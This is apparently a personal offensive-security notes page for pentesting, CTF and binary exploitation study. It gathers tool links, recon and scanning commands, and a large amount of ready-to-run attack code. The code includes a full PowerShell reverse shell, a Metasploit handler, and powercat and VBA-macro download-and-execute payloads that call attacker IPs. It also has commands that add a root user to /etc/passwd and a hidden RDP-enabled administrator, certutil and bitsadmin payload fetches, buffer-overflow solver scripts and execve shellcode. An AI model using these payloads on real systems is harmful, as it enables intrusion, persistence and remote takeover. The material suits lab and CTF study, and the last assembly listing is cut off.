Notes

Table of Contents

• Passive Reconnaissance
  • Domain / DNS
  • API Search
  • Search Engine
  • Internet archives search
  • Secret scanning
  • File search
  • Other
• Active Reconnaissance
• Network Scanner
  • Nmap
• Web Vulnerability Scanner
• Directory Bursting
• Parameter Scanner
• JS Scanner
• Penetration Testing
  • Tools
  • Training
• Penetration Testing Methodologies
  • Reverse Shell
  • Full TTY
  • Persistence
  • Privilege Escalation
  • Credential Access & Dumping
  • Host Discovery
  • Port Forwarding
  • Lateral movement
  • File Transfer
  • Wordlist
  • Post Exploitation
• Vulnerability
  • Front-end
  • XSS
  • Prototype Pollution
  • CSS Injection
  • XS Leaks
  • DOM Clobbering
  • XS-Leaks
  • SQLi
  • SSTI
  • CSRF
  • 401/403 Bypass
  • Path Taversal / Directory Traversal
  • Command Injection
  • DNS Rebind Attack
  • RCE
  • Information Disclosure
  • Apache Tomcat
  • Curated
• CTF
  • Self-Hosted CTF Platform
  • CTF Design
  • Event
  • Always online CTFs
  • Getting Started / Tutorials
  • Other
• Pwn
  • Notes
  • Challenges / Wargames
  • Tools
  • Solver Script Template
  • Assembly
  • Disassembly
  • Shellcode
  • x86
  • x86_64
  • Format String Attack
  • ELF
  • Heap
• Reversing
  • Windows
  • Python
  • Uncategorized
  • Android
  • dotnet dnSpy
• Web
  • Specification
  • Vulnerability research approach
  • Burp Suite
  • OWASP
  • Training
  • Web Assembly
  • Web API
  • GraphQL
  • Json Web Token (JWT)
  • Simple HTTP Server
  • Browser Extension
  • RDBMS
  • Web Archiver
  • Python Flask
  • Service Worker
  • Web Browser
  • XMPP
  • Web application frameworks benchmark
• Crypto
  • Hash Length Extension
  • oneliner
• Forensics
  • Steganography
  • DFIR
  • Other
• Networking
  • SSL/TLS
  • openssl
• OSINT
• Game Hacking
• Wi-Fi
• GitHub
  • Dork
  • GraphQL API: Query Example
• Bug Bounty
  • Platform
  • Available Programs
  • Curated
  • Getting Started / Tutorials
  • Writeup
  • Blog
  • Tools
  • Other
• Code Analysis
  • Static Code Analysis
• Cheat Sheets
• Linux
  • Bash snippet
  • Kali Linux
• Windows
  • Active Directory (AD)
  • Unquoted Service
  • Powershell
  • AD CS (Active Directory Certificates Service)
  • Install Microsoft 365 free
  • RDP
  • RDP over SSH
  • smbclient
• Programming language
  • Python
  • Lua
  • PHP
  • JavaScript
  • Ruby
  • Scheme
  • Java
  • Erlang
  • Common Lisp
  • C++
  • PowerShell
  • Markdown
  • Sandbox Service
  • Source Code Hosting
• Data Structures & Algorithms
• Computer Scinence
• Machine Learning / Deep Learning
• Emacs
• Static Site Generator
• Certificates
  • OSCP (Offensive Security Certified Professional)
• Tools
  • netcat
• Media
  • Book
  • Scholarly Articles, Academic Paper
  • Video
  • Podcast
• Stuff

Passive Reconnaissance

• PasteHunter - Scanning pastebin with yara rules
• theHarvester - E-mails, subdomains and names Harvester - OSINT

Domain / DNS

• DNSdumpster.com - dns recon & research, find & lookup dns records
• ViewDNS.info - Your one source for DNS related tools!
• crt.sh - Certificate Search

API Search

• ApisList - The Public APIs List, a curated list for the public web Apis
• RapidAPI - API Hub - Free Public & Open Rest APIs | Rapid
• APIs.guru - create a machine-readable Wikipedia for Web APIs in the OpenAPI Specification format

Search Engine

• Shodan Search Engine - A search engine for Internet-connected devices
  • Shodan Dorks - Shodan Dorks by twitter.com/lothos612 Feel free to make suggestions
• Censys Search - Censys helps organizations, individuals, and researchers find and monitor every server on the Internet to reduce exposure and improve security

Internet archives search

• waymore

  python3 ~/tools/waymore/waymore.py -i DOMAIN -oR ./waymore/$(date +%Y%m%d-%H%m%s)

Secret scanning

• trufflehog

  trufflehog filesystem <path> --json | grep -v AlgoliaAdminKey
  trufflehog github --repo=https://github.com/trufflesecurity/test_keys --issue-comments --pr-comments

File search

• gf

  # Install and Setup
  go install github.com/tomnomnom/gf@latest
  
  git clone https://github.com/tomnomnom/gf.git ~/tools/gf
  cp -r ~/tools/gf/examples/ ~/.gf
  
  # list available pattern
  gf -list
  
  # check pattern
  gf -dump urls

gf pattern

• 1ndianl33t/Gf-Patterns
• emadshanab/Gf-Patterns-Collection

Other

• The Recon-ng Framework - Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources
• Hunter - Hunter is your all-in-one email outreach platform
• Buckets Listing - Public Buckets by GrayhatWarfare
• BuiltWith Technology Lookup - Find out what websites are Built With
• 厚生年金保険・健康保険　適用事業所検索システム | 日本年金機構

Active Reconnaissance

• TLS Certificates without SNI

  openssl s_client -connect example.com:443 -showcerts < /dev/null

• TLS Certificates with SNI

  openssl s_client -connect example.com:443 -servername example.com -showcerts < /dev/null

Network Scanner

Nmap

nmap -p- --min-rate 5000 -sVC -Pn --open 192.168.0.123

# slow scan
nmap --top-ports=100 -T2 192.168.0.123

-T Option

• Timing Templates (-T) | Nmap Network Scanning
• Timing and Performance | Nmap Network Scanning

Scanning Active Directory Controller

nmap -p53,88,135,139,389,445,464,593,636,3268,3269,3389 -sVC -sT -Pn <ip>

Web Vulnerability Scanner

• nikto - web server scanner

  # check proxy setting
  grep PROXY /etc/nikto.conf
  
  nikto -useproxy -Pause 1 -host https://${DOMAIN}/

• whatweb - Web scanner

  whatweb --user-agent "hackerone_researcher_4n86rakam1" -a 3 https://${DOMAIN}/
  whatweb --proxy 127.0.0.1:8080 -a 3 --max-threads 1 https://${DOMAIN}/

Directory Bursting

• ffuf - Fast web fuzzer written in Go

  mkdir -p ffuf
  ffuf -ic -u https://${DOMAIN}/FUZZ -w /usr/share/wordlists/dirb/common.txt -r -t 2 -p 0.5-1 -ic -of all -o ffuf/$(date +%Y%m%d-%H%M%S)

Parameter Scanner

• Paramspider - Find HTTP Query Parameter from web.archive.org

  ~/tools/ParamSpider/paramspider.py -d ${DOMAIN} --exclude woff,png,svc,jpg --output ./paramspider/$(date +%Y%m%d-%H%M%S).txt
  
  # with gf
  gf xss ./paramspider

• Arjun - HTTP parameter discovery suite

  arjun -u http://${DOMAIN}/
  
  # via proxy
  HTTP_PROXY=http://127.0.0.1:8080 HTTPS_PROXY=http://127.0.0.1:8080 arjun -u https://${DOMAIN}/ --stable --headers "User-Agent: hackerone_researcher_<yourname>"

JS Scanner

• LinkFinder - A python script that finds endpoints in JavaScript files

  mkdir -p LinkFinder
  ~/tools/LinkFinder/linkfinder.py -i https://${DOMAIN} -o cli > LinkFinder/$(date +%Y%m%d-%H%M%S).txt
  
  ## Burp input
  ~/tools/LinkFinder/linkfinder.py -i burpfile -b -o cli > ${DOMAIN}.txt

• JSScanner - Scan JavaScript Files to find endpoints

  echo https://${DOMAIN} > domains.txt
  ~/tools/JSScanner/script.sh domains.txt
  
  # Find URL with gf
  gf urls ./Jsscanner_results

• Download the same domain JavaScript URL

  mkdir -p javascripts
  echo https://${DOMAIN}/ | hakrawler | grep -iahE "https?://[^\"\\'> ]+\\.js" | grep -E "//${DOMAIN}" | sort -u | xargs wget -x -P javascripts -q
  find javascripts -type f -name "*.js" -exec js-beautify -r {} +

Penetration Testing

• PENETRATION TESTING PRACTICE LAB - VULNERABLE APPS / SYSTEMS
• The Penetration Testing Execution Standard
• Penetration test - Wikipedia
• WSTG
• Penetration Testing Methodology, Part 1/6 — Recon
• enaqx/awesome-pentest
• Total OSCP Guide
• Basic Pentesting: 1 ~ VulnHub
• PenTest.WS
• Pentest-Tools.com
• MITRE ATT&CK®
• Red Team Reconnaissance Techniques
• Red Team Notes

Tools

• GTFOBins - GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
• WADComs - WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.
• LOLBAS - Living Off The Land Binaries, Scripts and Libraries
• explainshell.com - match command-line arguments to their help text
• Penetration Testing Tools - Kali Linux Tools Listing
• Exploit Database Search - Search Exploit Database for Exploits, Papers, and Shellcode

Training

• TryHackMe
• Hack The Box
• VulnHub
• Root Me
• PentesterLab

Penetration Testing Methodologies

Reverse Shell

• Reverse Shell Generator
• php-reverse-shell | pentestmonkey
• MSFvenom - Metasploit Unleashed
• msfvenom | OSCP Notes
• Shells · Total OSCP Guide
• Controlling your server with a reverse shell attack | Snyk
• hoaxshell
• Villain
• Offensive-Reverse-Shell-Cheat-Sheet

PowerShell

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex ". { $data } 2>&1" | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};

$client.Close()

Listening

Metasploit Framework multi/handler payload

msfconsole -q -x "use exploit/multi/handler;\
                          set PAYLOAD windows/meterpreter/reverse_tcp;\
                          set LHOST 192.168.119.128;\
                          set LPORT 443;\
                          run"

Full TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo; fg;
export SHELL=/bin/bash; export TERM=screen; stty rows 81 columns 238; reset;

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
ctrl Z
stty raw -echo; fg
reset

• Full TTYs - HackTricks
• Upgrading Simple Shells to Fully Interactive TTYs - ropnop blog
• Upgrading simple (reverse-)shells to fully interactive TTYs

Persistence

• nohup
• besimorhino/powercat - netshell features all in version 2 powershell
• Windows Powershell nohup

Invoke-Wmimethod -Class Win32_Process -Name Create -ArgumentList "powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.16.5/powercat.ps1'); mycat -c 10.10.16.5 -p 443 -e powershell;"

Create root user

# foo:$1$mysalt$4Lz7hS.y2V54mV2gJXEKR/:0:0::/tmp/foo:/bin/bash
echo foo:$(openssl passwd -1 -salt mysalt password):0:0::/tmp/foo:/bin/bash >> /etc/passwd

# login with password user
su foo  # enter 'password'

windows add-admin.bat

@ECHO OFF
:: This batch file adds user to Administrator and enables RDP
Title Add user
echo Adding user...
net user myadmin password1@ /add
net localgroup Administrators myadmin /add
net localgroup "Remote Desktop Users" hoge /add
ECHO Enabling RDP...
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ECHO ====================
ECHO User added
ECHO ====================
net users

Privilege Escalation

• Windows elevation of privileges
• metasploit-framework/documentation/modules/post/multi/recon/local_exploit_suggester.md at master · rapid7/metasploit-framework

Identify process Windows

:: netstat -> tasklist
netstat -ano | findstr TCP | findstr ":0"
:: =>   TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       2820

tasklist /v | findstr 2820
:: => CloudMe.exe                   2820                            0     37,444 K Unknown         N/A                                                     0:00:00 N/A

• RunasCs.exe - The binary link: v1.5

RunasCs.exe user1 password1 cmd.exe -r 10.10.10.10:4444

Credential Access & Dumping

• Dumping and Cracking mscash - Cached Domain Credentials - Red Teaming Experiments
• gentilkiwi/mimikatz - A little tool to play with Windows security

Host Discovery

Ping Sweep

base="192.168.0"; seq 1 254 | xargs -P 100 -I {} sh -c "ping -W 2 -c 2 $base.{} 2>/dev/null 1>&2 && echo $base.{}"

Nmap ping scan -sn option

nmap -sn --min-rate 5000 192.168.0.0/24

Port Forwarding

SSH Port Forwarding

Dynamic

ssh -N -D 127.0.0.1:8080 [email protected]

/etc/proxychains.conf

socks4 127.0.0.1 9050

proxychains and Nmap

proxychains nmap --top-ports=20 -sT -Pn 192.168.1.110

local port forwarding

ssh -N -L 0.0.0.0:445:<target ip>:445 [email protected]

chisel

jpillora/chisel

curl -sL https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -o- | zcat > chisel
chmod +x ./chisel

Attacker

./chisel -p 25 --reverse

Target

# 127.0.0.1:8080 is in target, R:3000 is in host machine
./chisel client --max-retry-count 0 <kali ip>:25 R:3000:127.0.0.1:8080

./chisel client --max-retry-count 0 <kali ip>:25 R:3000:10.10.14.16:8080

./chisel client --max-retry-count 0 192.168.119.128:25 R:3306:10.5.5.11:3306

socks proxy

Reverse SOCKS Proxy Using Chisel — The Easy Way | by Vegard Wærp | Medium

Target

./chisel client --max-retry-count 0 192.168.119.128:25 R:socks

• Tunneling and Port Forwarding - HackTricks

Lateral movement

• Derivative Local Admin. Intro | by Justin Warner | Medium

File Transfer

PowerShell

Download file

(New-Object System.Net.WebClient).DownloadFile('http://192.168.119.186/nc.exe', 'C:\Windows\Tasks\nc.exe');

Download and execute

IEX(New-Object System.Net.WebClient).DownloadString('http://10.11.2.242/nc.exe')

PowerShell in cmd.exe

:: download and save file
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.156/nc.exe', 'C:\Windows\Tasks\nc.exe')"

:: download and output
powershell -c "(New-Object System.Net.WebClient).DownloadString('http://10.11.2.242/test.ps1')"

powercat

# Load The Function From URL:
IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.16.5/powercat.ps1')

# Send File:
powercat -c 10.1.1.1 -p 443 -i C:\inputfile

# Recieve File:
powercat -l -p 8000 -of C:\inputfile

cmd.exe

cmd /c bitsadmin /transfer pwn /download http://192.168.119.156/nc.exe C:\Windows\Tasks\nc.exe
bitsadmin /transfer pwn /download http://192.168.119.156/nc.exe C:\Windows\Tasks\nc.exe
bitsadmin /transfer pwn /download http://10.11.2.242/PrintSpoofer64.exe C:\Windows\Tasks\PrintSpoofer64.exe
certutil.exe -urlcache -split -f "http://192.168.119.156/nc.exe" nc.exe

• Basic Win CMD for Pentesters - HackTricks

VBA Macro

Dim Str As String
Str = "powershell -c ""$code=(New-Object System.Net.Webclient).DownloadString('http://192.168.119.137:8000/reverse-shell.txt'); iex 'powershell -E $code'"""
CreateObject("Wscript.Shell").Run Str

• Basic PowerShell for Pentesters - HackTricks

SMB file share

# Kali
impacket-smbserver <user> .

:: Victim
:: Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
net use * \\<ip>\<user>

Wordlist

• SecLists - List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
• Assetnote Wordlists - This website provides you with wordlists that are up to date and effective against the most popular technologies on the internet.
• crunch - Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations.
• wordlistctl - Fetch, install and search wordlist archives from websites and torrent peers
• mentalist - Mentalist is a graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper
• english-words - A text file containing 479k English words for all your dictionary/word-based projects e.g: auto-completion / autosuggestion
• username-anarchy - Username tools for penetration testing

custom wordlist from HTML

curl -s http://runner.htb/ | html2text | tr ' ' '\n' | tr -d '.,:*!' | sort -u > list.txt

Post Exploitation

• CrackMapExec - A swiss army knife for pentesting networks
• NetExec - The Network Execution Tool, based on CrackMapExec
• Nishang - Offensive PowerShell for red team, penetration testing and offensive security
• PowerShell-Suite - This is a collection of PowerShell utilities

Vulnerability

• CVE - Common Vulnerabilities and Exposures
• cvelistV5 - CVE cache of the official CVE List in CVE JSON 5.0 format
• CVE Researcher Reservation Guidelines
• Search CVE List
• NVD - National Vulnerability Database
• CWE - Common Weakness Enumeration
• CAPEC - Common Attack Pattern Enumeration and Classification (CAPEC™)

Front-end

• Beyond XSS - Explore the Web Front-end Security Universe
• BlackFan/content-type-research
• RenwaX23/XSS-Payloads - List of XSS Vectors/Payloads

XSS

• Cross-site scripting contexts | Web Security Academy
• Cross-Site Scripting (XSS) Cheat Sheet - 2023 Edition | Web Security Academy
• XSS Hunter
• What is Cross-site Scripting and How Can You Fix it?
• CTFのWebセキュリティにおけるXSSまとめ（PRSSI, XFS, CSS Injection）
• Tiny XSS Payloads
• Cross Site Scripting - Payloads All The Things
• Browser's XSS Filter Bypass Cheat Sheet
• s0md3v/AwesomeXSS

Refrected XSS checker

#!/usr/bin/env bash

random_str=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 6 | head -n 1)

# payload="${random_str}<>?,.:\";'{}|[]\\()_+&#!"

# url encoded
payload="${random_str}%3C%3E%22%27,.:;%7B%7D%7C%5B%5D%5C()_+\&?"
echo paylaod: ${payload}

while IFS= read -r url; do
    fuzz_url=$(echo "${url}" | sed -e "s/FUZZ/${payload}/g")
    echo test: "${fuzz_url}"

    curl --proxy http://127.0.0.1:8080 -k -s -A "hackerone_reseacher_<yourname>" "${fuzz_url}" \
        | grep --color=always -oP ".{0,10}${random_str}.{0,40}"

    echo

    sleep 2
done < param-urls.txt

# param-urls.txt is
# http://example.com/id=FUZZ

Prototype Pollution

Prototype Pollution to RCE (PP2R)

• OurChallenges/XNUCA2019Qualifier/Web/hardjs at master · NeSE-Team/OurChallenges
• Node.jsでプロトタイプ汚染後に任意コード実行まで繋げた事例 - knqyf263's blog

CSS Injection

• Testing for CSS Injection | OWASP WSTG
• CSS Injection | HackTricks
• CSS Injection | XS-Leaks Wiki
• CSSインジェクション | 技術者ブログ | 三井物産セキュアディレクション株式会社
• Blind CSS Exfiltration: exfiltrate unknown web pages | PortSwigger Research
• The Sexy Assassin Tactical Exploitation using CSS. - ppt download
• hackvertor/blind-css-exfiltration
• m---/onsen

XS Leaks

• Introduction | XS-Leaks Wiki
• XS-Search/XS-Leaks | HackTricks | HackTricks

DOM Clobbering

• DOM clobbering - Wikipedia
• DOM clobbering | Web Security Academy
• DOM Clobbering まとめ – やっていく気持ち
• XSS in GMail's AMP4Email via DOM Clobbering - research.securitum.com
• DOM Clobbering strikes back | PortSwigger Research
• Hijacking service workers via DOM Clobbering | PortSwigger Research

XS-Leaks

• Introduction | XS-Leaks Wiki

SQLi

• SQL Injection Payload List. PayloadBox | by #ismailtasdelen | Medium
• The SQL Injection Knowledge Base
• payloadbox/sql-injection-payload-list

SSTI

• us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
• Server Side Template Injection - Payloads All The Things
• payloadbox/ssti-payloads
• Jinja2 template injection filter bypasses | Sebastian Neef - 0day.work

CSRF

• check CSRF token
• check CORS header Access-Control-Allow-Origin: * in response headers
• check Set-Cookie header in response headers What's SameSite value?

401/403 Bypass

• Ultimate 401 and 403 bypass methods

Path Taversal / Directory Traversal

• Directory Traversal - Payloads All The Things
• File Inclusion - Payloads All The Things
• CTFのWebセキュリティにおけるPath Traversal, LFI/RFI (File Upload, ZipSlip)
• File Inclusion and Path Traversal - Web Applications Pentesting
• LFI to RCE via PHP PEARCMD

Command Injection

• payloadbox/command-injection-payload-list

DNS Rebind Attack

• CWE - CWE-350: Reliance on Reverse DNS Resolution for a Security-Critical Action (4.13)
• 1u.ms
• mogwailabs/DNSrebinder

RCE

• CVE-2023-43177 - CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes
• CVE-2023-49297 - Unsafe YAML deserialization in PyDrive2, CLoader

Information Disclosure

• Sybil-Scan/imagemagick-lfi-poc: ImageMagick LFI PoC [CVE-2022-44268] - CVE-2022-44268 ImageMagick 7.1.0-49 Arbitrary File Read

Apache Tomcat

• ApacheTomcatScanner - A python script to scan for Apache Tomcat server vulnerabilities

Curated

• HackTricks
• Payloads All The Things

CTF

Self-Hosted CTF Platform

• ctf-platform · GitHub Topics
• CTFd
• rCTF
• FBCTF
• RootTheBox
• kCTF
• How do I host a CTF - CTF Handbook

CTF Design

• CTF Design Guidelines - Google Docs
• How to run a CTF that survives the first 5 minutes | by Sam Calamos | Medium
• Self-hosting a CTF Platform (CTFd)
• Top 6 Platforms to Run your CTF On - CyberTalents

Event

• CTFtime.org

Always online CTFs

• Hacker101 CTF
• picoCTF
• CpawCTF2
• Game Detectives
• ksnctf
• CTFlearn
• 247CTF
• setodaNote CTF Exhibition
• OOO archive | DEF CON CTF
• Best CTF Platforms
• W3Challs
• WeChall
• Webhacking.kr
• AlpacaHack

Getting Started / Tutorials

• CTF 101
• The CTF Primer
• Introduction | CTF Resources
• Introduction · CTF Field Guide
• Introduction - CTF Wiki
• zardus/ctf-tools
• CTF-Heaven/Cheatsheets

Other

• apsdehal/awesome-ctf - A curated list of CTF frameworks, libraries, resources and softwares
• CTF vs Real World: CTFs vs Real life scenarios : cybersecurity
• CTF vs Bug Bounty: Bug Bounty vs. CTF [Understanding Differences & Benefits] | HackerOne

Pwn

Notes

• Binary Exploitation Notes
• MinGW-w64
• CS6265: Information Security Lab
• CTF Pwn - A painter and a black cat
• Pwn 入門編 - HackMD
• "Reverse Engineering for Beginners" free book
• RE for Beginners | Reverse Engineering

Challenges / Wargames

• ROP Emporium
• pwnable.tw
• Reversing.Kr
• pwn.college
• Microcorruption
• shellphish/how2heap
• OverTheWire: Wargames
• SmashTheStack Wargaming Network
• io.netgarage.org
• xelenonz/game
• Crackmes
• FuzzySecurity
• Reverse Engineering challenges

Tools

socat: Launch server

socat tcp4-listen:5700,reuseaddr,fork EXEC:./start,pty,stderr

• cheat.sh/socat

gdb (peda-gdb)

basic commands

• disassemble main, disas main
• set disassembly-flavor intel
• break main, b main
• run, r

instruction level

• stepi, si
• nexti, ni

program level

• step into, s
• next, n

Examine x

• Examine memory: x/NFU address
  • N = number
  • F = format
  • U = unit
• Examples
  • x/10xb 0xdeadbeef, examine 10 bytes in hex
  • x/xw 0xdeadbeef, examine 1 word in hex
  • x/s 0xdeadbeef, examine null terminated string
• help x to show details.

telescope

• telescope [address]

gdb io

• r $(your_command_here): Use command output as an argument
• r < <(your_command_here): Use command as input
• r > filename: Write command output to file
• r < filename: Use file as input

disassemble oneliner

gdb -batch -ex 'file /bin/ls' -ex 'disassemble main'

show context

context all
context reg
context stack

follow-fork-mode

set follow-fork-mode parent

References

• Forks (Debugging with GDB)
• gdb-peda quits while debugging program, regular gdb works file · Issue #143 · longld/peda
• linux - Managing inputs for payload injection? - Reverse Engineering Stack Exchange

radare2

r2 ./binary
> aaa
> s main
> V
p

Generate payload command

python3 -c 'import sys; sys.stdout.buffer.write(b"A"*27 + b"\xbd\x86\x04\x08")'
python2 -c 'print b"A"*27 + b"\xbd\x86\x04\x08"'

echo -n 'AAAAAAAAAAAAAAAAAAAAAAAAAAA\xbd\x86\x04\x08'

Pwntools

• pwntools-cheatsheet.md

  log.warn('a warning message')     # -> [!] a warning message
  log.info('some information')      # -> [*] some information
  log.debug('a debugging message')  # -> [DEBUG] a debugging message

Solver Script Template

C code

/*
compiled with
gcc -m32 -fno-stack-protector -o start start.c
*/

#include <stdio.h>
#include <stdlib.h>

void shell() {
    printf("You did it.\n");
    system("/bin/sh");
}

void vuln() {
    char buf[10] = {0};
    scanf("%s", buf);
}

int main(int argc, char const *argv[])
{
    printf("shell address: %p\n", shell);
    vuln();
}

Python socket library only

import socket
import struct

host = "localhost"
port = 5700

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

shell_address = 0x565561BD

payload = b""
payload += b"A" * 22
payload += struct.pack("I", shell_address)

s.recv(1024)

s.send(payload + b"\n")
s.recv(1024)

s.send(b"id" + b"\n")
s.recv(1024)
print(s.recv(1024))

s.close()

Python pwntools

from pwn import *

elf = ELF("./start")

if args.REMOTE:
    host = "localhost"
    port = 5700

    io = remote(host, port)
else:
    io = elf.process()

shell_address = 0x565561BD

io.sendline(b"A" * 22 + p32(shell_address))
io.clean()
io.interactive()

Assembly

Basic Concept

test.c --preprocess--> included header, macro code --compile--> test.s --assemble--> test.o --link--> test

• GCC and Make - A Tutorial on how to compile, link and build C/C++ applications

x86 AT&T

shellcode.s

xor    %eax,%eax
push   %eax
push   $0x68732f2f
push   $0x6e69622f
mov    %esp,%ebx
mov    %eax,%ecx
mov    %eax,%edx
mov    $0xb,%al
int    $0x80
xor    %eax,%eax
inc    %eax
int    $0x80

gcc -m32 -c shellcode.s
ld -m elf_i386 -o shellcode shellcode.o
./shellcode

x86 intel

shellcode.s

xor    eax, eax
push   eax
push   0x68732f2f
push   0x6e69622f
mov    ebx, esp
mov    ecx, eax
mov    eax, edx
mov    al, 0x0b
int    0x80
xor    eax, eax
inc    eax
int    0x80

nasm -f elf shellcode.s
ld -m elf_i386 -o shellcode shellcode.o
./shellcode

References

• how to assemble assembly with NASM assembler to 32-bit or 64-bit ELF binary with or without libc
• nasm-assembly-examples/gcc-cheat-sheet.md
• nasm-assembly-examples/nasm-cheat-sheet.md
• NASM-Assembly-Cheat-Sheet/Cheat-Sheet.md
• x64 NASM Cheat Sheet

Disassembly

• Online x86 and x64 Intel Instruction Assembler

Shellcode

Shellcode Example References

• Linux/x86 - execve(/bin/sh) - 28 bytes
• Shellcodes database for study cases
• Exploit Database Shellcodes
  • linux_x86

Shellcode as string (binary to bytes)

• Linux Shellcode 101: From Hell to Shell - BreakInSecurity

  objdump -d ./execve|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Pwntools shellcraft

• pwnlib.shellcraft — Shellcode generation — pwntools 4.11.0 documentation

Command Line

$ shellcraft -f d i386.linux.sh
\x6a\x68\x68\x2f\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x68\x01\x01\x01\x01\x81\x34\x24\x72\x69\x01\x01\x31\xc9\x51\x6a\x04\x59\x01\xe1\x51\x89\xe1\x31\xd2\x6a\x0b\x58\xcd\x80

$ # -f format, --format format
$ #                       Output format (default: hex), choose from {e}lf, {r}aw, {s}tring, {c}-style array, {h}ex string, hex{i}i, {a}ssembly code, {p}reprocssed code, escape{d} hex string
$ shellcraft -f d i386.linux.exit 0
\x31\xdb\x6a\x01\x58\xcd\x80

$ shellcraft -f a i386.linux.exit 0
    /* exit(status=0) */
    xor ebx, ebx
    /* call exit() */
    push SYS_exit /* 1 */
    pop eax
    int 0x80


$ shellcraft -f h i386.linux.exit 0
31db6a0158cd80

Python

from pwn import *

elf = ELF("bugspray")
context.binary = elf

sc += asm(shellcraft.amd64.linux.cat("flag.txt"))
sc += asm(shellcraft.amd64.linux.exit(0))

payload += asm(shellcraft.execve('/bin/sh'))

x86 Shellcode Example

exit(2)

Assembly test.s

global _start

section .text

_start
        mov     eax, 1
        mov     ebx, 0
        int     0x80

Assemble

nasm -f elf32 test.s
ld -m elf_i386 -o test test.o
./test

Get hex machine code

$ objdump -d ./test |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x31\xdb\xb0\x01\xcd\x80"

shellcode

int main(int argc, char *argv[])
{
  char shellcode[] = "\x31\xc0\x31\xdb\xb0\x01\xcd\x80";
  (*(void(*)()) shellcode)();
  return 1;
}

See also: man exit.2

• assembly - How to get c code to execute hex machine code? - Stack Overflow

hello world: write(2)

$ grep '__NR_write ' /usr/src/linux-headers-6.3.0-kali1-amd64/arch/x86/include/generated/uapi/asm/unistd_32.h
#define __NR_write 4

test.s

global          _start

section         .data
        msg     db "Hello World!", 0

section         .text

_start:
        ;; write(1, hello, 13)
        mov     eax, 4
        mov     ebx, 1
        mov     ecx, msg
        mov     edx, 13
        int     0x80

        ;; exit(0)
        mov     eax, 1
        mov     ebx, 0
        int     0x80

Assemble

nasm -f elf32 test.s
ld -m elf_i386 -o test test.o
./test

but it's not working as shellcode

https://stackoverflow.com/questions/15593214/linux-shellcode-hello-world

1

/*
global          _start

section         .text

_start:
        jmp     message

main:
        ;; write(1, hello, 13)
        xor     eax, eax
        mov     al, 4
        xor     ebx, ebx
        mov     bl, 1
        pop     ecx
        xor     edx, edx
        mov     dl, 16
        int     0x80

        ;; exit(0)
        xor     eax, eax
        mov     al, 1
        xor     ebx, ebx
        mov     bl, 1
        int     0x80

message:
        call    main
        msg     db "Hello World!", 0dh, 0ah

section         .data

$ nasm -f elf32 test.s && ld -m elf_i386 -o test test.o
$ objdump -d ./test |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x19\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x59\x31\xd2\xb2\x10\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80\xe8\xe2\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a"
*/

// gcc -m32 -fno-stack-protector -z execstack -o hello hello.c

int main(int argc, char *argv[])
{
  char shellcode[] = "\xeb\x19\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x59\x31\xd2\xb2\x10\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80\xe8\xe2\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x0d\x0a";
  (*(void(*)()) shellcode)();
  return 1;
}

2

/*
global          _start

section         .text

_start:
        ;; write(1, "Hello World!\n", 13)
        xor     eax, eax
        mov     al, 4
        xor     ebx, ebx
        mov     bl, 1

        ;; >>> msg = "Hello World!\n"
        ;; >>> [hex(u32(msg[i:i+4].ljust(4, '\x00'))) for i in range(0, len(msg), 4)][::-1]
        ;; ['0xa', '0x21646c72', '0x6f57206f', '0x6c6c6548']
        push    0xa
        push    0x21646c72
        push    0x6f57206f
        push    0x6c6c6548

        mov     ecx, esp
